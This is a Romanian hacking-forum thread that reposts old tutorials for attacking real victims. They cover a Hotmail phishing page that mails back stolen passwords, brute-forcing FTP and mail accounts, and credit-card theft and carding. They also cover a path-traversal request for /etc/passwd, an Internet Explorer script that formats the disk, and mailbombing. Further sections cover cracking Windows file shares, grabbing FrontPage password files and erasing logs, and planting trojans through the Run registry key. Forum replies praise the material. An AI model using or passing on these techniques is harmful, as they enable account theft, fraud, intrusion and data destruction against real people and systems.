EliteHackers
SALUT 2022!!
NE-AM MUTAT PE DISCORD !
Vrei să inviți un prieten?
[T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r
Acesta aste link-ul oficial al acestui server.
|
Lista Forumurilor Pe Tematici
|
EliteHackers | Reguli | Inregistrare | Login
POZE ELITEHACKERS
Nu sunteti logat.
|
Nou pe simpatie:
Larina23 la Simpatie.ro
 | Femeie
24 ani
Timis
cauta Barbat
28 - 80 ani |
|
Exploit
Administrator
 Din: I'm from everywhere..
Inregistrat: acum 18 ani
Postari: 600
|
|
Va prezint in continuare niste tutoriale facute de un hacker respectat in Romania asta...care cred ca pana la urma a ajuns si el la parnaie...dar nu bag mana in foc pt asta ...
Deci repet: Tutorialele nu sunt gandite de mine.. Tutorialele lui nebunu au fost printre primele materiale informative in legatura cu hacking-ul ... acu cativa ani buni... si mi s-au parut foarte interesante ....
_______________________________________
...:::Only God Can Judge Me:::...
|
|
| pus acum 18 ani |
|
Exploit
Administrator
Din: I'm from everywhere..
Inregistrat: acum 18 ani
Postari: 600
|
|
Doar nu va asteptati ca serverul andre.ro sa fie vulnerabil!A fost odata,acum odata cu ultima mea
tentativa si-a intalat firewall.Este vorba de serverul gazda al lui andre.ro,dcmhosting.com
sau cam asa ceva.Astazi invatam cum sa furam conturi de mail.
1)Faceti-va o pagina la geocities.com,si folositi username-ul "johnny"
2)cand vi se cere adresa de mail dati adresa voastra
3)pagina aceasta o numiti index.html si o puneti pe domeniul de la
geocities.com pe care tocmai l-ati deschis
4)trimiteti victimei dvs aceasta pagina(care deschide message.htm) si asteptati:
<html><thead><title>titlu</title><head><body>
<script>self.location="numele site-ulul dvs de pe geocities";</script></body></html>
Cand victima deschide pagina este redirectat de functia self.location catre site-ul
dumneavoastra si crede ca are de-a face cu un mesaj de eroare.Ca urmare va introduce
ID-ul si parola care va vor parveni prin mail.Binenteles ca sa folositi acest sistem victima
trebuie sa aiba un cont la hotmail.Daca are cont in alta parte schimbati putin pagina index.htm
conform cu serverul de mail.Spre exemplu daca adresa victimei este E-mail trebuie
sa primesc un mesaj de eroare ca venind de la home.ro nu de la homail cum este prezentat in exemplu.
Priviti sursa paginii message.htm si anume portiunea <FORM ACTION=".....">si veti vedea ca fisierul
mail.pl avand ca parametru userul dvs de la geocities(i-am zis johnny dar puteti sa-l schimbati)
va trimite voua prin mail ID-ul,parola si IP-ul fraierului.
_______________________________________
...:::Only God Can Judge Me:::...
|
|
| pus acum 18 ani |
|
Exploit
Administrator
Din: I'm from everywhere..
Inregistrat: acum 18 ani
Postari: 600
|
|
Se pot obtine incredibil de multe informatii despre un server cu ajutorul tehnicii numite "port scanning".Voi prezenta in continuare principalele porturi care ofera acces la informatia de care avem nevoie.Dar ce este un port?Pe intelesul tuturor un port este ca o "conducta" prin care circula pachetele de date.Cu ajutorul acestora se realizeaza conexiunea intre doua computere dupa cum este prezentat in tabelul de mai jos:
PORT SERVICI
80,8000,8080 se ocupa de gestiunea informatiei privtoare la paginile web
21 serviciu ftp
23 serviciu telnet
25 serviciu de transmitere a mesajelor de mail
110 serviciu de primire a mesajelor de mail
139 optiunea "file and print sharing" pentru windows
Cand unul dintre aceste porturi este deschis inseamna ca pe computerul respectiv este instalat serviciul corespunzator.Daca in urma scanarii rezulta ca portul 139 este deschis atunci computerul respectiv este ca si hackerit(vezi tutorialele precedente).Daca portul 25 este seschis atunci putem trimite meaje false de mail(vezi tuitorialul sendmail).Ne conectam cu urmatoarea comnda "telnet 10.45.6.6 25" unde 10.45.6.6 este adresa de IP a serverului.Nu voi insista asupra notiunii de daemon,tot ce trebuie sa stiti este ca reprezinta un program care ruleaza pe portul respectiv.Ideea este ca atunci cand vedeti un port deschis sa va conectati sa vedeti ce serviciu ruleaza pe el.
Voi prezenta in continuare unealta mea favorita de scanare a porturilor si anume FScan.exe.Il puteti lua de la tastand in motorul de cautare ce apare "Fscan" sau "scan".Optiunile sunt urmatoarele:
-?/-h - shows this help text
-a - append to output file (used in conjunction with -o option)
-b - get port banners
-c - timeout for connection attempts (ms)
-d - delay between scans (ms)
-e - resolve IP addresses to hostnames
-f - read IPs from file (compatible with output from -o)
-i - bind to given local port
-l - port list file - enclose name in quotes if it contains spaces
-n - no port scanning - only pinging (unless you use -q)
-o - output file - enclose name in quotes if it contains spaces
-p - TCP port(s) to scan (a comma separated list of ports/ranges)
-q - quiet mode, do not ping host before scan
-r - randomize port order
-t - timeout for pings (ms)
-u - UDP port(s) to scan (a comma separated list of ports/ranges)
-v - verbose mode
-z - maximum simultaneous threads to use for scanning
O traducere cred ca nu mai are rost asa ca o sa dau cateva exemple de folosire:
Example #1:
Scaneaza serverul de adresa 10.0.2.2 pentru toate porturile de la 1 la 200.
FScan -p 1-200 10.0.2.2
-------------------
Example #2:
Scaneaza serverele de IP range de la 10.0.2.2 la 10.0.2.254 pentru toate porturile de la 1 la
65535 depunand rezultatele in out.txt
FScan -p 1-65535 10.0.2.2-254 -o out.txt
-------------------
Example #3:
Scaneaza serverele de IP range de la 10.0.2.2 la 10.0.2.20 pe porturile 80, 81, 88, 8000 si
8080 fara ca sa adauge inregistrari in out.txt
FScan -aqp 80,81,88,8000,8080 -u 31337 10.0.2.2-20 -o out.txt
Celelalte optiuni le invatati si singuri dupa ce incarcati programul de la
Apropo, o comanda foarte utila este:
FScan -p 1-140 4.35.37.1-255
Aflam daca serverele ruleaza sub Unix sau Windows si daca portul 139 in cazul windowsului este deschis.
_______________________________________
...:::Only God Can Judge Me:::...
|
|
| pus acum 18 ani |
|
Exploit
Administrator
Din: I'm from everywhere..
Inregistrat: acum 18 ani
Postari: 600
|
|
Se poate afla parola unui server folosind metode mai putin inteligente cum ar fi conectarile repetate. Pentru acest lucru este necesar un program de brute force cracking.Cel mai bun program de acest tip este 'Brutus'. In motorul de cautare tastati 'Brutus' sau 'brute force'.Dar cel mai bine se intelege privind urmatorul exemplu. Sa prsupunem ca serverul are client prima data o conexiune: Deschidem Start/Run si tastam:
open
220
220
220
220
220
connecting to server running WU_FTPD): {introduceti debbbie}
password:********
userid/password incorrect login failed
goodbye
Dupa cum am vazut serverul,chiar daca nu a permis conectarea,a fost destul de amabil incat sa
ne ofere doua informatii de mare inportanta:
username:debbie
tipul de server:WU_FTPD
Ori gasim un exploit pentru wu_ftpd ori incercam un brute force cracking.Programul Brutus ofera doua posibilitati de a ataca un server:folosind un dictionar de parole sau incercand toate combinatiile posibile.Din moment ce stiti username-ul inlocuiti fisierul 'users.dat' care este livrat cu Brutus cu un fisier in care puneti un singur nume si anume 'debbie'.Fisierul astfel creat puteti sa-l denumiti tot 'user.dat'.Tot ce va ramane de facut dupa ce ati facut setarile este sa asteptati. Dupa ce epuizati incercarile cu dictionarul,setati optiunea 'brute force' si selectati optiunile dorite. Ideal ar fi sa stim lungimea parolei sau numarul de caractere din care este alcatuita parola precum si natura acestora.Initial eu obisnuiesc sa fac urmatoarele setari privind parola:
length min:0
length max 10
custom char :0123456789
In felul acesta incerc intai toate combintiile numerice posibile apoi schimb optiunea cu litere:
custom char:abcderftyijop
Aceasta metoda este absolut sigura dar are doua dezavantaje majore:
1)Timpul mare de asteptare (1 ora-cateva luni depinde de noroc).Pentru cineva care are Net-ul pe Lan nu este o problema(firma sau alta institutie).
2)Ip-ul dvs este inregistrat,asa ca incercati sa folositi un proxy server sau un program
precum 'jammer' care zice-se ca ascunde numarul de telefon.
Voi mai da un exempu de bug in ftp:
open 220
220
220
...
connecting to........):ftp {introduceti un user implicit} passrord:guest
ftp>dir 'tastati dir sa vedeti la ce directoare aveti acces'
Daca vedeti un director numit cgi-bin,cgi-win sau script atunci servrul este hackerit!!! Cautati un exploit adecvat pentru sistemul de operare respectiv(stiti cum sa-l aflati) il puneti pe desktop apoi dati urmatoarea comanda(pres. ca exploitul se numeste expl.exe):
cd cgi-bin(sau ce director gasiti)
put expl.exe
apoi tastati 'quit' ,deschideti browserul si tastati(pres. ca directorul este cgi-bin):
Nu mai ramane altceva decat sa asteptati rezultatul executiei exploitului,caruia bineinteles ai cititi documentatia inainte de a fi folosit.
_______________________________________
...:::Only God Can Judge Me:::...
|
|
| pus acum 18 ani |
|
Exploit
Administrator
Din: I'm from everywhere..
Inregistrat: acum 18 ani
Postari: 600
|
|
Deoarece am primit multe mail-uri privitoare la cartile de credit m-am decis sa scriu un tutorial privitor la acestea.NU SUNT RASPUNZATOR DE ACTIUNILE DUMNEAVOASTRA DUPA CE CITITI ACEST MATERIAL.AM INCLUS ACEST SUBIECT NUMAI PENTRU A SATISFACE CURIOZITATEA UNORA DINTRE VOI PRECUM SI CU SCOP INFORMATIV. Bineinteles teoria exploiturilor functioneaza de minune: 1)SUSTRAGEREA NUMARULUI CARDULUI DIN CALCULATORUL ALTEI PERSOANE. Este cea mai utilizata metoda si functioneaza asupra calculatoarelor cu windows instalat.Exploitul este scanarea pe portul 139 a acelor calculatoare care au optiunea "file ad print sharing" activa.Tot ce are de facut un hacker este sa scaneze IP-urile pe o anumita raza de exemplu 4.37.1.1-4.38.1.255 iar apoi sa urmeze instructiunile din tutorialul pe care l-am dedicat hackeririi windowsului 2)FOLOSIREA UNUI PROGRAM DE CARDING Programele de acest tip extrapoleaza un numar valabil si generaza alte carti de credit valabile sau pur si simplu genereaza numere de carti de credit.Cele mai utilizate tipuri de carduri sunt:mastercard,visa,american express.Un program interesant este Card Wizard.Mod de folosire: Deschideti un site porno cum ar fi ,cautati o pagina care contine posibilitatea de a introduce un numar de card,deschideti Card Wizard-ul odata cu pagina si incercati.Cit mai multe incercari cit mai multe sanse - 3)FORUM EXPLOIT,ECRANE FALSE,MAIL EXPLOIT Guestbook-ul de la si orice guestbook in general poate fifolosit in astfel de scopuri. -afiliati-va unui astfel de guestbook -studiati foarte bine formularul -modificati acest formular -redirectati informatia introdusa spre alt site pentru a nu fi vazut -initial modificati formularul prezentindu-l ca fiind formularul unui site comercial....... *Cumparati un domeniu in care sa aveti acces la cgi-bin sau cgi-win construiti-va un fals site comercial care sa para veridic apoi scrieti un script care va pune numarul cartii de credit introduse de lamer intr-un fisier text. *Un exemplu sugestiv de ecran care poate fi falsificat este cel de la yahoo. Il puteti incarca si modifica.Modificati de fapt sursa paginii,adica numai partea de
Vedeti sursa programului meu de mailbombing?Modificati-l incat sa trimita prin posta de mail numere de credit in loc de mesaje. *Urmariti cu ajutorul unui program de detectare informatia transmisa de pe un site comercial apoi puteti ataca calculatarele care primesc aceasta informatie. Ca sa puteti vedea modul de transmitere a informatiei de pe un calculator pe altul folositi comanda : c:/windows>tracert si veti vedea toate calculatoarele prin care trece semnalul inainte de a ajunge pe serverul andre.ro 4)EXPLOITURI IN PROGRAMELE DE CARDING Deschideti un site comercial,introduceti un numar fals apoi urmariti cu atentie adresa din browser ,un exemplu ar fi ... 5789652314 apoi gasiti o modalitate de a fenta autentificarea.Spre exemplu am dezasamblat programul card32.exe si nu mica mi-a fost mirarea cand am descoperit o parola implicita "whoami". Sfatul meu este sa va luati programul w32dasm ,sa dezasamblati programele care va intereseaza si sa le intelegeti structura interna.Am dat de fapt un exemplu in tutorialul in care am crack-uit notepad.exe si winzip.exe. Daca dezasamblati troianul SubSeven veti descoperi o parola in limba romana care este pi.. a . mail la E-mail Chiar daca nu raspund din lipsa acuta de timp va asigur ca le citesc pe toate!
_______________________________________
...:::Only God Can Judge Me:::...
|
|
| pus acum 18 ani |
|
Exploit
Administrator
Din: I'm from everywhere..
Inregistrat: acum 18 ani
Postari: 600
|
|
Ne vom ocupa in acest tutorial de conturile dial-up.
Cerinte: programul Fscan pe care-l puteti lua de pe packetstorm.securify.com
Continut:
1)Strangerea de informatii(partea cea mai grea de fapt)
2)Atacul propriu zis.
3)contul dial-up in registrii windows-ului
1)Majoritatea firmelor distribuitoare de Internet de la noi din tara prezinta o mare vulnerabilitate,aceea de a asigna numele utilizatorului folosit pentru conexiunea la internet,unei adrese de mail.Spre exemplu ISP-ul meu este
firma ISP(doar un exemplu) iar userul meu folosit pentru conectare este "nebunu".Atunci adresa mea de mail este E-mail sau E-mail daca aflu parola de la mail aflu si parola folosita pentru dial-up.
Stiti cred din tutorialele anterioare ca serverul pe care se afla mesajele primite are portul 110 deschis.iar cel folosit la transmiterea mesajelor are portul 25 deschis.Pe noi ne intereseaza portul 110.Dar cum aflam care este
adresa serverului pe care se afla mesajele?Simplu.Intai aflam IP-ul providerului de internet,tastand:
tracert -j
Presupunem ca IP-ul gasit este 154.14.14.25.Pentru afla care este serverul de receptie a mesajelor scanam IP-urile pe o raza care sa incadreze ultimul numar al IP-ului providerului,in cazul nostru pentru portul 110.Dar nu
strica sa stim daca are si portul 79 deschis.....
fscan -vbp 79,110 154.14.14.1-254
Presupunem ca IP-ul gasit este 154.14.14.144.Ca se ne convingem ca intr-adevar
este serverul cautat,lansam din Start/Run urmatoarea comanda:
telnet 154.14.14.144 110
Dupa ce ne conectam tastam
user blahbla
si vom primi ceva de genul +OK apoi tastam
pass blabla
si vom primi un mesaj de eroare.Ne-am convins ca acesta este serverul!.
Daca cumva aveti un cont la firma respectiva puteti sa va conectati asa:
telnet server_de primire 110
user userul_tau
pass parola_ta
si iti poti citi mail-ul folosind telnetul.
2)Daca stim userul mai trebuie sa aflam parola pentru a intra in posesia contului.Pentru asta folosim un
program de brute force(Brutus.Unsecure,WWWhack etc).Le gasiti folosind motorul de cautare.In general lungimea parolei trebuie sa depaseasca 5 caractere,asa ca nu merge cu optiunea "brute force".Construiti-va un dictionar de parole care sa corespunda unui alt dictionar care sa cuprinda userii.Intai incercati daca userul si parola nu sunt identice,am intalnit
cazuri din astea.Ca sa aflati direct user-ul intrati pe un chat,si folositi optiunea "finger" a programului mIRC.
Posibilitatile sunt nesfarsite,incercati....
3)Evident ca tot ce tastam ramane stocat in registrii windowsului.Pentru a afla datele despre conexiune deschidem meniul Start optiunea Run si tastam Regedit.Datele despre conexiune se afla la
H_KEY_CURRENT_USER/REMOTE ACCESS/PROFILE/"numele conexiunii"
Puteti afla astel userul dar parola este in binar si poate fi convertita usor,o sa scriu curand un tutorial despre asta.
_______________________________________
...:::Only God Can Judge Me:::...
|
|
| pus acum 18 ani |
|
Exploit
Administrator
Din: I'm from everywhere..
Inregistrat: acum 18 ani
Postari: 600
|
|
Am primit multe mesaje de la anumite persoane care considerau ca nu am fost suficient
de explicit in legatura cu informatiile despre ftp si telnet.
Poate ca au dreptate,dar acesta este ultimul tutorial despre acest subiect.
Cu ajutorul programului ftp nu se pot lansa comenzi pe serverul gazda,dar
se pot afla comenzile disponibile pe server care pot fi executate cu telnetul.
Tastez ftp
open
username:nebunu
password:*******************
user nebunu logged in
tastez "remotehelp" la promptul ftp ce apare si voi primi ca raspuns o serie de comenzi
ce pot fi executate pe computerul gazda
una dintre comenzile cele mai folositoare este "syst"
Copiez cu grija toate comenzile disponibile iar apoi tastez "quit"
Lansez apoi o sesiune telnet pe portul corespunzator ftp-ului si anume 21
Tastez telnet nebunu.home.ro 21 in submeniul run al meniului start
Voi primi un mesaj de intampinare din partea daemonului care ruleaza pe portul 21.
tastez
user nebunu
pass ***************(parola mea)
iar apoi pot da comenzile necesare printre care si "syst"
Tastez "quit"
Informatii folositoare pot obtine conectandu-ma pe portul 80 care automat este deschis
telnet nebunu.home.ro 80
tastez urmatoarele comenziputeti sa le incercati)
get /http/1.1 (pentru a vedea sursa paginii principale)
put fisier.htm /http/1.1 (pentru a incarca ceva pe server,in cazul asta nu merge)
Se poate tasta orice comanda cum ar fi "blablabla" urmata de doua apasari succesive
rapide ale tastei Enter,iar raspunsul va fi
bad request
server:numele sistemului de operare
Dar de ce trebuie sa cunosc sistemul de operare al gazdei?.Aceasta este cea mai obisnuita
intrebare care mi se pune si eu o gasesc fireasca.
Raspuns:Pentru a putea plasa un exploit trebuie sa cunosc sistemul de operare pentru care
acesta ruleaza la parametrii normali.Un exploit scris in limbaj de comanda Linux(bash)
(asemanator cu fisierele bat din DOS) evident nu poate rula pe un server care foloseste
o versiune de Windows(probabil NT).O alta explicatieaca cunoastem sistemul de operare
respectiv putem sa gasim un bug in CGI(common gateway interface).De exemplu pentru un server
pe care ruleaza MultiHTML 2.0 un bug ar fi tastarea in browser a urmatoarei comenzi:
... swd%00html
Aceasta are ca rezultat obtinerea fisierului cu parola mult ravnita.Sa studiem putin comanda.
multihtml.pl este un program scris in Perl a carei executie are ca rezultat redarea fisierului
cerut cu extensia htm.Dar ce se intampla daca cer alt fisier?.Parametrul pe care-l dau
progamului este /etc/passwd(fisierul cu parola).%00htm inseamna ca nu are extensia htm.
%00 este caracterul NULL in limbajul Perl.Exemplele ar putea continua la nesfarsit dar
un hacker trebuie sa invate si singur nu numai sa copieze de la altii.
Sunt o multime de comenzi unix pe care le puteti incerca daca va faceti cont la nether.net.
Am primit de asemenea foarte multe intrebari despre mailbombing.
Mailbombingul este o tehnica folosita de lameri pentru a va umple casuta postala cu mesaje
insultatoare si repetate.Am inclus in pagina mea un program de mailbombing scris in javascript
cu ajutorul caruia puteti trimite 1000000 de mesaje in casuta postala a cuiva.
Acest program este inclus doar pentru a vedea cum functioneaza,eventual il puteti incerca
pe casuta dvs postala dar daca il folositi pe casuta postala a altcuiva,adresa dvs de mail
este vizibila si va puteti pierde contul de internet deoarece mailbombingul este ilegal.
program de mailbombing
De asemenea nu prea se stie cum se executa un exploit pe un calculator gazda.
Raspuns:fie cu ajutorul telnetului dupa ce a fost instalat cu ajutorul ftp-ului
fie cu ajutorul unui client ftp for windows care permite lansarea de aplicatii pe
calculatorul gazda.
_______________________________________
...:::Only God Can Judge Me:::...
|
|
| pus acum 18 ani |
|
Exploit
Administrator
Din: I'm from everywhere..
Inregistrat: acum 18 ani
Postari: 600
|
|
Sunt dator sa va explic ceva ce a ramas neexplicat in tutorialele trecute.Pentru ca programele de scanare a optiunii "file and print sharing" sa functioneze trebuie sa aveti aceasta optiune activata si sa aveti instalate protocoalele pentru lucrul in retea.Pentru a intelege mai mult despre netbios tastati in motorul de cautare "netbios" si cititi tutorialele prezentate.As dori acum sa discutam despre pericolele pe care le inplica javascripturile atasate paginilor web,sau trimise prin mail impeuna cu paginile web.Stiati ca datorita unui bug in Internet Explorer5.x v-i se poate formata hardul diect dintr-o pagina web,mai precis dupa ce resetati calculatorul?Am inclus mai jos sursa unei pagini care face acest lucru.
Bineinteles ca nu sunteti asa idioti incat sa o rulati cu comanda "format",schimbati comanda cu una inofensiva cum ar fi "wsh.run('command /c cls',false,6);"
in loc de wsh.run('command /c format/q/autotest/u',false,6);
Incarcati pagina
Modificati putin pagina incarcata punind totul pe o singura linie in Notepad.Ma refer numai la sursa paginii html nu la toata pagina prezentata.ATENTIE!!!.Pagina nu are linkuri valabile deoarece am luat-o de pe net si
oricum programul exe2html nu merge.Spre exemplu comanda
<a href=javascript:for i=1 to 2000{window.open("http://www.nebunu.home.ro/"}>apasa aici</a>
deschide de 2000 ori pagina mea de web blocandu-va astfel conexiunea.
_______________________________________
...:::Only God Can Judge Me:::...
|
|
| pus acum 18 ani |
|
Exploit
Administrator
Din: I'm from everywhere..
Inregistrat: acum 18 ani
Postari: 600
|
|
In acest tutorial promit ca voi fi foarte ordonat.Am atatea sa scriu incat nu stiu ce sa scriu mai intai si iese "varza",o provocare pentru inteligenta dumneavoastra.Inainte de a incepe trebuie sa mentionez ceva foarte important.
CA SA HACKERITI CU SUCCES UN SERVER TREBUE SA AVETI ACELASI SISTEM DE OPERARE!!!!!!!
Continut:
1)Hackeriti serverul de la distanta
2)Hackeriti paginile Web gazduite de acesta
3)Infiltrati troieni peun calculator pe care aveti acces(cum ar fi calculatorul scolii).
11)In tutorialul precedent a fost prezentata o mare vulnerabilitate a windowsului si anume optiunea "file and print sharing".Programele necesare sunt nbtstat.exe(il aveti deja),net.exe(probabil il aveti si pe acesta) si nat.exe.Deoarece stiti deja ce face nbtstatul trcecem la celelalte doua programe.In exemplul nostru presupunem ca serverul are IP-ul 123.123.123.123. iar numele este server.com .IP-ul se poate afla cu ajutorul comenzii "tracert -j."Apoi se foloseste comanda "nbtstat -A 123.123.123.123. "Iata rezultatul acestei comenzi:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-C0-4F-C4-8C-9D
Student1 este numele computerului.Apoi dupa ce am aflat aceasta informatie tastam:
C:>net view 123.123.123.123
C:>net view \student1
Shared resources at 123.123.123.123
Share name Type Used as Comment
------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.
Asa aflam daca optiunea "file and print sharing este" activata.Apoi tastam urmatoarea comanda:
C:net use x: \123.123.123.123test
The command completed successfully.
Acum sa accesam noul disc creat si anume X:
C:net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK X: \123.123.123.123test Microsoft Windows Network
OK \123.123.123.123test Microsoft Windows Network
The command completed successfully.
In mod normal cand gasim un calculator cu "file and print sharing" ni se cere o parola.Aceata parola o putem sparge cu ajutorul programului PQwak.exe.Rulati-l,completati formularul si apoi asteptati.Nu trebuie sa asteptati prea mult.
Acum sa prezentam programul Nat.exe,foarte preferat de hackeri.Iata optiunile acestuia:
NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>
OPTIONS
-o Specifica fisierul in care se vor depune rezultatele scanarii unei "raze" de IP.
-u Specifica fisierul care contine numele de utilizatori(useri)
-p Specifica fisierul care contine parolele(password)
<address>
raza de IP care trebuie scanata.Iata un exempu.
C:nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30
Chiar daca nu "sparge" parola,totusi gaseste calculatoarele cu "file and print sharing" ceea ce este acelasi lucru pentu ca folosim programul PQwak.
2)Acesta este o lista care contine fisiere importante de pe server in relatie cu discul c:/ adica adresa fizica.
C:InetPubwwwroot <Home>
C:InetPubscripts /Scripts
C:InetPubwwwroot_vti_bin /_vti_bin
C:InetPubwwwroot_vti_bin_vti_adm /_vti_bin/_vti_adm
C:InetPubwwwroot_vti_bin_vti_aut /_vti_bin/_vti_aut
C:InetPubcgi-bin /cgi-bin
C:InetPubwwwrootsrchadm /srchadm
C:WINNTSystem32inetserviisadmin /iisadmin
C:InetPubwwwroot_vti_pvt
C:InetPubwwwrootsamplesSearchQUERYHIT.HTM Internet Information Index Server sample
C:Program FilesMicrosoft FrontPage_vti_bin
C:Program FilesMicrosoft FrontPage_vti_bin_vti_aut
C:Program FilesMicrosoft FrontPage_vti_bin_vti_adm
C:WINNTSystem32inetserviisadminhtmldocsadmin.htm /iisadmin/isadmin
Stiind aceste lucruri putem hackeri serverul via html(adica putem schimba paginile web).Intai trebuie sa testam cu ajutorul telnetului existenta acestor "rute".
c:/windows>telnet 123.123.123.212 80(telnet pe serverul cu adresa 123.123.123.123 pe portul 80) si dam comenzile:
GET /_vti_inf.html -------ne asiguram ca este instalat frontpage
GET /_vti_pvt/service.pwd-------ne asiguram daca exista un fisier cu parola
GET /_vti_pvt/authors.pwd ----numai pentru servere Netscape(contine parola si userul criptate)-folositi "john the ripper"
GET /_vti_pvt/administrators.pwd
GET /_vti_log/author.log -----dupa ce patrundem pe server acest fisier trebuie sters sau schimbat deoarece contine adresa voastra IP
Deschidem Frontpage Explorer sau Frontage Express (pentru Windows 95) ,optiunea OPEN si selectam pagina dorita aflata la distanta http:// (restul completam noi).Puteti incerca asa cu pagina mea,completind in rubrica "location" vi se va cere parola dar Windows NT este foarte vulnerabil.Pagina mea de la home.ro nu se afla gazduita peun server sub Windows,asa ca nu ncercati numic,v-ati putea pierde contul de NET .
3)Un troian este un program cu ajutorul caruia puteti patrunde pe calculatorul altei persoane.Un asemenea program este compus din doua fisiere executabile(server.exe si client.exe.).Server.exe trebuie rulat pe calculatorul fraierului iar cu ajutorul programului client.exe va conectati.Daca aveti acces la un calculator trebuie sa instalati programul astfel incat sa fie rulat la butarea calculatorului.E mai smplu decat sa astepti sa-l ruleze cineva.Voi da doua metode:
"1" Il introduceti in calea de startup.Pentru Windows95/98 calea este c/windows/start menu/programs/startup/server.exe.
"2" Cred ca aceasta metoda este buna pentru orice fel de Windows.Creati fisierul "fisier.reg" in care scrieti secventa urmatoare:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"nebunu"="server.exe"
apoi il executati.Ca urmare a acestei executii se modifica registrii windowsului.Incercati cu alt program inofensiv cum ar fi notepad.exe.
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"nebunu"="notepad.exe"
_______________________________________
...:::Only God Can Judge Me:::...
|
|
| pus acum 18 ani |
|
SpiderLxC
EliteHackers Silver
 Inregistrat: acum 17 ani
Postari: 24
|
|
Marfa raw exploit  ai ce invatza de aici nu gluma 
_______________________________________
Professional Hacker
|
|
| pus acum 17 ani |
|
|
niky14
EliteHackers Bronze
Inregistrat: acum 17 ani
Postari: 31
|
|
Am ametit.......................
|
|
| pus acum 17 ani |
|
PC_Killer
EliteHackers Gold
 Inregistrat: acum 17 ani
Postari: 43
|
|
e mishto  intradevar, e cam mult de citit, dar merita
|
|
| pus acum 17 ani |
|
|
amerycanu
EliteHackers Diamond
Inregistrat: acum 17 ani
Postari: 94
|
|
prea tare NO COMMENT, multumim anticipat
PS: te asteptam si cu alte tutoriale 
|
|
| pus acum 17 ani |
|